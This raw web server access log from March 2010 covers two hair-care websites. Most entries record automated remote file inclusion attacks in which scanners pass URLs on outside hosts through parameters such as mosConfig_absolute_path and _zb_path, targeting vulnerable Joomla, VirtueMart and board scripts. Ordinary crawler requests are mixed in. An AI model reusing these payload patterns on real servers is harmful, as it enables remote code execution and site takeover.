85.214.108.69 - - [14/Mar/2010:20:47:20 -0700] "GET /?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [14/Mar/2010:20:47:25 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dogcafe.co.kr/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.200 - - [14/Mar/2010:20:47:52 -0700] "GET /freehairsecretsphp/templates/subSilver/images/lang_english/icon_email.gif HTTP/1.1" 200 820 "-" "Googlebot-Image/1.0" "www.freehairsecrets.com"
201.28.110.99 - - [14/Mar/2010:20:49:19 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
201.28.110.99 - - [14/Mar/2010:20:49:20 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
201.28.110.99 - - [14/Mar/2010:20:49:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
201.28.110.99 - - [14/Mar/2010:20:49:28 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.28.110.99 - - [14/Mar/2010:20:49:28 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.28.110.99 - - [14/Mar/2010:20:49:28 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:50:56 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:05 -0700] "GET /logs/access.log HTTP/1.1" 200 78443 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:11 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:17 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:21 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:30 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 2162688 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:31 -0700] "GET /logs/scripts.log HTTP/1.1" 200 2701 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:42 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:47 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [14/Mar/2010:20:53:52 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
217.147.29.50 - - [14/Mar/2010:20:53:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "growlonghairfast.com"
194.63.141.198 - - [14/Mar/2010:20:53:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:56:35 -0700] "GET /logs/access.log/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:56:35 -0700] "GET /?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:56:35 -0700] "GET /logs/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:58:23 -0700] "GET /?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:58:23 -0700] "GET /logs/access.log/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.108.69 - - [14/Mar/2010:20:58:23 -0700] "GET /logs/?sourcedir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.234 - - [14/Mar/2010:20:58:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:20:59:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:20:59:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:20:59:18 -0700] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:00:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:00:42 -0700] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:00:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.74 - - [14/Mar/2010:21:00:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5448 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
78.110.50.120 - - [14/Mar/2010:21:03:22 -0700] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [14/Mar/2010:21:03:22 -0700] "GET /logs/access_091012.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [14/Mar/2010:21:03:22 -0700] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:03:47 -0700] "GET /logs/access_100125.log//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:03:47 -0700] "GET /logs//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:03:47 -0700] "GET /bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:04:25 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:04:25 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:04:25 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:05:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:05:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:05:08 -0700] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.57.90.154 - - [14/Mar/2010:21:05:40 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:05:43 -0700] "GET /logs/access.log%20%20//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [14/Mar/2010:21:05:43 -0700] "GET /logs//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [14/Mar/2010:21:05:43 -0700] "GET /bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.72.184.95 - - [14/Mar/2010:21:06:11 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.fresharticlesnow.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.freehairsecrets.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:06:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.57.90.154 - - [14/Mar/2010:21:07:03 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.227.136.138 - - [14/Mar/2010:21:07:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:07:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:34 -0700] "GET /logs/access_091130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:44 -0700] "GET /logs/access_091130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:49 -0700] "GET /logs/access_091130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:08:50 -0700] "GET /logs/access_091123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:09:03 -0700] "GET /logs/access_091123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.227.136.138 - - [14/Mar/2010:21:09:08 -0700] "GET /logs/access_091123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [14/Mar/2010:21:10:27 -0700] "GET /?_zb_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:11:27 -0700] "GET /bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:11:27 -0700] "GET /logs//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:11:27 -0700] "GET /logs/access.log%20%20//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:11:37 -0700] "GET /bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [14/Mar/2010:21:11:37 -0700] "GET /logs/access.log%20%20//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.47.7.71 - - [14/Mar/2010:21:11:37 -0700] "GET /logs//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.28.110.99 - - [14/Mar/2010:21:14:27 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [14/Mar/2010:21:14:52 -0700] "GET /logs/access_100125.log//?_zb_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [14/Mar/2010:21:14:52 -0700] "GET /?_zb_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [14/Mar/2010:21:14:53 -0700] "GET /logs//?_zb_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:15:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:15:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:15:01 -0700] "GET /logs/access_091214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:16:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:16:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.217.76.226 - - [14/Mar/2010:21:16:10 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.47.7.71 - - [14/Mar/2010:21:16:37 -0700] "GET /logs/access.log%20%20//bbs/delete_all.php?mosConfig_absolute_path=http://www.djwest.org/board/data/bogel/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:39 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:39 -0700] "GET /logs/access_100125.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:40 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:40 -0700] "GET /logs/access_100125.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [14/Mar/2010:21:19:40 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:02 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [14/Mar/2010:21:20:04 -0700] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
